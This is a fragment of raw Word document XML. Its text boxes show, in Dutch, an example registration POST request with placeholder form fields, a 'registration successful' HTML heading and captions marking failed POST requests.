                          <a:ext cx="5874385" cy="9042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8CB726F" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="000B674F" w:rsidRDefault="00CE4BB5"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4FF1CDA9" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="000B674F" w:rsidRDefault="00CE4BB5"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60ADDF0E" w14:textId="0327671A" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="0037022C">
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                                <w:color w:val="000000"/>
                                <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
                              </w:rPr>
                              <w:t>&lt;h3&gt;</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                                <w:color w:val="000000"/>
                                <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
                              </w:rPr>
                              <w:t>Registratie</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                                <w:color w:val="000000"/>
                                <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> is </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                                <w:color w:val="000000"/>
                                <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
                              </w:rPr>
                              <w:t>succesvol</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                                <w:color w:val="000000"/>
                                <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
                              </w:rPr>
                              <w:t>&lt;/h3&gt;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E157A" id="Text Box 51" o:spid="_x0000_s1069" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-30.85pt;margin-top:101.05pt;width:462.55pt;height:71.2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QskYkCAACLBQAADgAAAGRycy9lMm9Eb2MueG1srFRLTxsxEL5X6n+wfC+bhIRCxAalIKpKCFCh&#10;4ux4bbKq1+PaTrLpr+9nbzZElAtVL7vjeT++mfOLtjFsrXyoyZZ8eDTgTFlJVW2fS/7j8frTKWch&#10;ClsJQ1aVfKsCv5h9/HC+cVM1oiWZSnkGJzZMN67kyxjdtCiCXKpGhCNyykKoyTci4umfi8qLDbw3&#10;phgNBifFhnzlPEkVArhXnZDPsn+tlYx3WgcVmSk5cov56/N3kb7F7FxMn71wy1ru0hD/kEUjaoug&#10;e1dXIgq28vVfrppaegqk45GkpiCta6lyDahmOHhVzcNSOJVrQXOC27cp/D+38nZ971ldlXwy5MyK&#10;BjN6VG1kX6hlYKE/GxemUHtwUIwt+Jhzzw9gprJb7Zv0R0EMcnR6u+9u8ibBnJx+Hh+fTjiTkJ0N&#10;xqNxbn/xYu18iF8VNSwRJfeYXm6qWN+EiEyg2qukYJaua2PyBI1NjECmrhIvPxKE1KXxbC0w/Njm&#10;pOHiQAuvzlJlqOyipIK7wjIVt0Ylh8Z+VxqtyvW9EUFIqWzso2TtpKWRz3sMd/rJtMvqPcZ7ixyZ&#10;bNwbN7Uln7uZd+ulMdXPPmXd6aPPB3UnMraLNmPk+KQf/IKqLfDgqduo4OR1jaHdiBDvhccKAQI4&#10;C/EOH21oU3LaUZwtyf9+i5/0gWxIOdtgJUsefq2EV5yZbxaYPxuOARkW82M8+TzCwx9KFocSu2ou&#10;CYMHrJFdJpN+ND2pPTVPuB7zFBUiYSViAyk9eRm7Q4HrI9V8npWwtU7EG/vgZHKd2pwg+dg+Ce92&#10;uI1A/C31yyumr+Db6SZLS/NVJF1nbKdGd13dDQAbnyG/u07ppBy+s9bLDZ39AQAA//8DAFBLAwQU&#10;AAYACAAAACEAHsg0g+MAAAALAQAADwAAAGRycy9kb3ducmV2LnhtbEyPQWvCQBCF74X+h2UKvekm&#10;MY0SM5FWEYrYg1qkxzUZk9DsbMiuGv99t6f2OLyP977JFoNuxZV62xhGCMcBCOLClA1XCJ+H9WgG&#10;wjrFpWoNE8KdLCzyx4dMpaW58Y6ue1cJX8I2VQi1c10qpS1q0sqOTUfss7PptXL+7CtZ9urmy3Ur&#10;oyBIpFYN+4VadbSsqfjeXzTC++G+2U2XH4nevK2+tkdpj+vVFvH5aXidg3A0uD8YfvW9OuTe6WQu&#10;XFrRIoyScOpRhCiIQhCemCWTGMQJYRLHLyDzTP7/If8BAAD//wMAUEsBAi0AFAAGAAgAAAAhAOSZ&#10;w8D7AAAA4QEAABMAAAAAAAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYA&#10;CAAAACEAI7Jq4dcAAACUAQAACwAAAAAAAAAAAAAAAAAsAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYA&#10;CAAAACEADFQskYkCAACLBQAADgAAAAAAAAAAAAAAAAAsAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAU&#10;AAYACAAAACEAHsg0g+MAAAALAQAADwAAAAAAAAAAAAAAAADhBAAAZHJzL2Rvd25yZXYueG1sUEsF&#10;BgAAAAAEAAQA8wAAAPEFAAAAAA==&#10;" filled="f" strokecolor="black [3213]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="18CB726F" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="000B674F" w:rsidRDefault="00CE4BB5"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4FF1CDA9" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="000B674F" w:rsidRDefault="00CE4BB5"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60ADDF0E" w14:textId="0327671A" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="0037022C">
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                          <w:color w:val="000000"/>
                          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
                        </w:rPr>
                        <w:t>&lt;h3&gt;</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                          <w:color w:val="000000"/>
                          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
                        </w:rPr>
                        <w:t>Registratie</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                          <w:color w:val="000000"/>
                          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> is </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                          <w:color w:val="000000"/>
                          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
                        </w:rPr>
                        <w:t>succesvol</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                          <w:color w:val="000000"/>
                          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
                        </w:rPr>
                        <w:t>&lt;/h3&gt;</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00B42C10" w:rsidRPr="00384C9C">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251887616" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="190C3D35" wp14:editId="24B94A59">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-389890</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>364490</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5873115" cy="764540"/>
                <wp:effectExtent l="0" t="0" r="19685" b="22860"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="205" name="Text Box 205"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5873115" cy="764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A405E1D" w14:textId="55714DC6" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="003E6292">
                            <w:pPr>
                              <w:pStyle w:val="HTMLPreformatted"/>
                              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                              <w:rPr>
                                <w:color w:val="008000"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                              </w:rPr>
                              <w:t xml:space="preserve">POST </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="808030"/>
                              </w:rPr>
                              <w:t>/</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                              </w:rPr>
                              <w:t>registreer</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="808030"/>
                              </w:rPr>
                              <w:t>-</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                              </w:rPr>
                              <w:t>account HTTP</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="808030"/>
                              </w:rPr>
                              <w:t>/</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="008000"/>
                              </w:rPr>
                              <w:t>1.1</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="61199342" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="003E6292">
                            <w:pPr>
                              <w:pStyle w:val="HTMLPreformatted"/>
                              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                              <w:rPr>
                                <w:color w:val="008000"/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="4B407BC0" w14:textId="16CCD78C" w:rsidR="00CE4BB5" w:rsidRPr="005761F4" w:rsidRDefault="00CE4BB5" w:rsidP="003E6292">
                            <w:pPr>
                              <w:pStyle w:val="HTMLPreformatted"/>
                              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                              <w:rPr>
                                <w:color w:val="000000" w:themeColor="text1"/>
                              </w:rPr>
                            </w:pPr>
                            <w:proofErr w:type="spellStart"/>
                            <w:r w:rsidRPr="005761F4">
                              <w:rPr>
                                <w:color w:val="000000" w:themeColor="text1"/>
                              </w:rPr>
                              <w:t>naam</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidRPr="005761F4">
                              <w:rPr>
                                <w:color w:val="000000" w:themeColor="text1"/>
                              </w:rPr>
                              <w:t>=</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r w:rsidRPr="005761F4">
                              <w:rPr>
                                <w:color w:val="000000" w:themeColor="text1"/>
                              </w:rPr>
                              <w:t>Pim&amp;email</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidRPr="005761F4">
                              <w:rPr>
                                <w:color w:val="000000" w:themeColor="text1"/>
                              </w:rPr>
                              <w:t>=</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r w:rsidRPr="005761F4">
                              <w:rPr>
                                <w:color w:val="000000" w:themeColor="text1"/>
                              </w:rPr>
                              <w:t>mail@email.nl&amp;bedrijf</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidRPr="005761F4">
                              <w:rPr>
                                <w:color w:val="000000" w:themeColor="text1"/>
                              </w:rPr>
                              <w:t>=</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r w:rsidRPr="005761F4">
                              <w:rPr>
                                <w:color w:val="000000" w:themeColor="text1"/>
                              </w:rPr>
                              <w:t>company&amp;tel</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidRPr="005761F4">
                              <w:rPr>
                                <w:color w:val="000000" w:themeColor="text1"/>
                              </w:rPr>
                              <w:t>=0610000000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C3D35" id="Text Box 205" o:spid="_x0000_s1070" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-30.7pt;margin-top:28.7pt;width:462.45pt;height:60.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6bmz4oCAACNBQAADgAAAGRycy9lMm9Eb2MueG1srFRLbxoxEL5X6n+wfG8WCIQUZYloolSVoiQq&#10;qXI2Xhus2h7XNuzSX9+xdxdQmkuqXnbH8358M1fXjdFkJ3xQYEs6PBtQIiyHStl1SX883326pCRE&#10;ZiumwYqS7kWg1/OPH65qNxMj2ICuhCfoxIZZ7Uq6idHNiiLwjTAsnIETFoUSvGERn35dVJ7V6N3o&#10;YjQYXBQ1+Mp54CIE5N62QjrP/qUUPD5KGUQkuqSYW8xfn7+r9C3mV2y29sxtFO/SYP+QhWHKYtCD&#10;q1sWGdl69Zcro7iHADKecTAFSKm4yDVgNcPBq2qWG+ZErgWbE9yhTeH/ueUPuydPVFXS0WBCiWUG&#10;h/Qsmki+QEMSDztUuzBDxaVD1digACfd8wMyU+GN9Cb9sSSCcuz1/tDf5I4jc3I5PR8OMQxH2fRi&#10;PBnnARRHa+dD/CrAkESU1OP8clvZ7j5EzARVe5UUzMKd0jrPUNvECKBVlXj5kUAkbrQnO4bjj01O&#10;Gl2caOGrtRQZLF2UVHBbWKbiXovkUNvvQmKzcn1vRGCcCxv7KFk7aUnM5z2GnX4ybbN6j/HBIkcG&#10;Gw/GRlnwuZt5u46NqX72KctWH/t8UnciY7NqMkrOp/3gV1DtEQ8e2p0Kjt8pHNo9C/GJeVwihAAe&#10;hviIH6mhLil0FCUb8L/f4id9xDZKKalxKUsafm2ZF5TobxZR/3k4RsiQmB/jyXSED38qWZ1K7Nbc&#10;AA5+iCfI8Uwm/ah7UnowL3g/FikqipjlGBuR0pM3sT0VeH+4WCyyEu6tY/HeLh1PrlObEySfmxfm&#10;XYfbiIh/gH592ewVfFvdZGlhsY0gVcZ2anTb1W4AuPMZ8t19Skfl9J21jld0/gcAAP//AwBQSwME&#10;FAAGAAgAAAAhAGnGsNziAAAACgEAAA8AAABkcnMvZG93bnJldi54bWxMj01Lw0AQhu+C/2EZwVu7&#10;qdokxGyKthSk1EM/KD1us2MSzM6G7LZN/73jSU/DMA/vPG8+G2wrLtj7xpGCyTgCgVQ601ClYL9b&#10;jlIQPmgyunWECm7oYVbc3+U6M+5KG7xsQyU4hHymFdQhdJmUvqzRaj92HRLfvlxvdeC1r6Tp9ZXD&#10;bSufoiiWVjfEH2rd4bzG8nt7tgo+drfVJpl/xnb1vjiuD9Iflou1Uo8Pw9sriIBD+IPhV5/VoWCn&#10;kzuT8aJVMIonL4wqmCY8GUjj5ymIE5NJkoIscvm/QvEDAAD//wMAUEsBAi0AFAAGAAgAAAAhAOSZ&#10;w8D7AAAA4QEAABMAAAAAAAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYA&#10;CAAAACEAI7Jq4dcAAACUAQAACwAAAAAAAAAAAAAAAAAsAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYA&#10;CAAAACEAR6bmz4oCAACNBQAADgAAAAAAAAAAAAAAAAAsAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAU&#10;AAYACAAAACEAacaw3OIAAAAKAQAADwAAAAAAAAAAAAAAAADiBAAAZHJzL2Rvd25yZXYueG1sUEsF&#10;BgAAAAAEAAQA8wAAAPEFAAAAAA==&#10;" filled="f" strokecolor="black [3213]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="3A405E1D" w14:textId="55714DC6" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="003E6292">
                      <w:pPr>
                        <w:pStyle w:val="HTMLPreformatted"/>
                        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                        <w:rPr>
                          <w:color w:val="008000"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                        </w:rPr>
                        <w:t xml:space="preserve">POST </w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="808030"/>
                        </w:rPr>
                        <w:t>/</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                        </w:rPr>
                        <w:t>registreer</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="808030"/>
                        </w:rPr>
                        <w:t>-</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                        </w:rPr>
                        <w:t>account HTTP</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="808030"/>
                        </w:rPr>
                        <w:t>/</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="008000"/>
                        </w:rPr>
                        <w:t>1.1</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="61199342" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="003E6292">
                      <w:pPr>
                        <w:pStyle w:val="HTMLPreformatted"/>
                        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                        <w:rPr>
                          <w:color w:val="008000"/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="4B407BC0" w14:textId="16CCD78C" w:rsidR="00CE4BB5" w:rsidRPr="005761F4" w:rsidRDefault="00CE4BB5" w:rsidP="003E6292">
                      <w:pPr>
                        <w:pStyle w:val="HTMLPreformatted"/>
                        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                        <w:rPr>
                          <w:color w:val="000000" w:themeColor="text1"/>
                        </w:rPr>
                      </w:pPr>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidRPr="005761F4">
                        <w:rPr>
                          <w:color w:val="000000" w:themeColor="text1"/>
                        </w:rPr>
                        <w:t>naam</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidRPr="005761F4">
                        <w:rPr>
                          <w:color w:val="000000" w:themeColor="text1"/>
                        </w:rPr>
                        <w:t>=</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidRPr="005761F4">
                        <w:rPr>
                          <w:color w:val="000000" w:themeColor="text1"/>
                        </w:rPr>
                        <w:t>Pim&amp;email</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidRPr="005761F4">
                        <w:rPr>
                          <w:color w:val="000000" w:themeColor="text1"/>
                        </w:rPr>
                        <w:t>=</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidRPr="005761F4">
                        <w:rPr>
                          <w:color w:val="000000" w:themeColor="text1"/>
                        </w:rPr>
                        <w:t>mail@email.nl&amp;bedrijf</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidRPr="005761F4">
                        <w:rPr>
                          <w:color w:val="000000" w:themeColor="text1"/>
                        </w:rPr>
                        <w:t>=</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidRPr="005761F4">
                        <w:rPr>
                          <w:color w:val="000000" w:themeColor="text1"/>
                        </w:rPr>
                        <w:t>company&amp;tel</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidRPr="005761F4">
                        <w:rPr>
                          <w:color w:val="000000" w:themeColor="text1"/>
                        </w:rPr>
                        <w:t>=0610000000</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="0925CED3" w14:textId="0D6C3CC7" w:rsidR="0004469B" w:rsidRPr="0074219A" w:rsidRDefault="0004469B" w:rsidP="009276BC">
      <w:pPr>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CB2871E" w14:textId="62D921F9" w:rsidR="00465456" w:rsidRDefault="00511A5D">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251932672" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="72544249" wp14:editId="78F7CE2C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-264160</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>5043805</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5842000" cy="231140"/>
                <wp:effectExtent l="0" t="0" r="25400" b="22860"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="201" name="Text Box 201"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5842000" cy="231140"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:schemeClr val="accent2">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EE8A82C" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00682D1F">
                            <w:r>
                              <w:t xml:space="preserve">Gefaalde </w:t>
                            </w:r>
                            <w:proofErr w:type="gramStart"/>
                            <w:r>
                              <w:t>POST</w:t>
                            </w:r>
                            <w:proofErr w:type="gramEnd"/>
                            <w:r>
                              <w:t xml:space="preserve">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544249" id="Text Box 201" o:spid="_x0000_s1071" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-20.8pt;margin-top:397.15pt;width:460pt;height:18.2pt;z-index:251932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6f+WqQCAAD0BQAADgAAAGRycy9lMm9Eb2MueG1srFRbb9MwFH5H4j9Yfmdpu26MaulUNg0hjW1i&#10;Q3t2HXuN8A3bbVJ+PZ+dpCsDhIZ4SY7P/XzncnrWakU2wofampKOD0aUCMNtVZvHkn65v3xzQkmI&#10;zFRMWSNKuhWBns1fvzpt3ExM7MqqSngCJybMGlfSVYxuVhSBr4Rm4cA6YSCU1msW8fSPReVZA+9a&#10;FZPR6LhorK+ct1yEAO5FJ6Tz7F9KweONlEFEokqK3GL++vxdpm8xP2WzR8/cquZ9GuwfstCsNgi6&#10;c3XBIiNrX//iStfc22BlPOBWF1bKmotcA6oZj55Vc7diTuRaAE5wO5jC/3PLrze3ntRVSRGfEsM0&#10;mnQv2kje25YkHhBqXJhB8c5BNbYQoNMDP4CZCm+l1+mPkgjkwHq7wze542AenUzRM4g4ZJPD8Xia&#10;G1A8WTsf4gdhNUlEST36l2Flm6sQkQlUB5UULFhVV5e1UvmRZkacK082DN1mnAsTJ9lcrfUnW3X8&#10;KTLo+w42pqNjHw9shMjTlzzlgD8FUeZvcWObsUlunrLDq7MUeSb7YhKuHX6ZilslkndlPguJnmQY&#10;/1jZECVrJy0JHF5i2Osn0y6rlxjvLHJka+LOWNfG+oz6DsYO4errkLLs9IHuXt2JjO2yzcN4eDLM&#10;19JWW4ydt93qBscva8zGFQvxlnnsKsYJ9yfe4COVbUpqe4qSlfXff8dP+lghSClpsPslDd/WzAtK&#10;1EeD5Xo3nmIyScyP6dHbCR5+X7Lcl5i1PrcYOKwPsstk0o9qIKW3+gFnapGiQsQMR+ySxoE8j91F&#10;wpnjYrHISjgPjsUrc+d4cp1gTpN/3z4w7/r1iFisaztcCTZ7tiWdbrI0drGOVtZ5hRLQHap9A3Ba&#10;8qD3ZzDdrv131no61vMfAAAA//8DAFBLAwQUAAYACAAAACEAVmT58OIAAAALAQAADwAAAGRycy9k&#10;b3ducmV2LnhtbEyPwU6DQBCG7ya+w2ZMvLVLCxZElkZrjKknSz143MIIpOwsYbcUffqOJ73NZL78&#10;8/3ZejKdGHFwrSUFi3kAAqm0VUu1go/9yywB4bymSneWUME3Oljn11eZTit7ph2Oha8Fh5BLtYLG&#10;+z6V0pUNGu3mtkfi25cdjPa8DrWsBn3mcNPJZRCspNEt8YdG97hpsDwWJ6Pg8+ft6fVuG5f78Xn5&#10;vtuGBSbHjVK3N9PjAwiPk/+D4Vef1SFnp4M9UeVEp2AWLVaMKojvoxAEE0mcRCAOPIRBDDLP5P8O&#10;+QUAAP//AwBQSwECLQAUAAYACAAAACEA5JnDwPsAAADhAQAAEwAAAAAAAAAAAAAAAAAAAAAAW0Nv&#10;bnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQAjsmrh1wAAAJQBAAALAAAAAAAAAAAAAAAA&#10;ACwBAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQBPp/5apAIAAPQFAAAOAAAAAAAAAAAAAAAA&#10;ACwCAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQBWZPnw4gAAAAsBAAAPAAAAAAAAAAAA&#10;AAAAAPwEAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAACwYAAAAA&#10;" fillcolor="#f7caac [1301]" strokecolor="black [3213]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="7EE8A82C" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00682D1F">
                      <w:r>
                        <w:t xml:space="preserve">Gefaalde </w:t>
                      </w:r>
                      <w:proofErr w:type="gramStart"/>
                      <w:r>
                        <w:t>POST</w:t>
                      </w:r>
                      <w:proofErr w:type="gramEnd"/>
                      <w:r>
                        <w:t xml:space="preserve"> Request</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00C80AF8">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251918336" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="06A0E74F" wp14:editId="6D973A5D">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-264795</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>14605</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5842635" cy="231140"/>
                <wp:effectExtent l="0" t="0" r="24765" b="22860"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="504" name="Text Box 504"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5842635" cy="231140"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:schemeClr val="accent2">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2149197" w14:textId="6E0C6F2C" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5">
                            <w:r>
                              <w:t xml:space="preserve">Gefaalde </w:t>
                            </w:r>
                            <w:proofErr w:type="gramStart"/>
                            <w:r>
                              <w:t>POST</w:t>
                            </w:r>
                            <w:proofErr w:type="gramEnd"/>
                            <w:r>
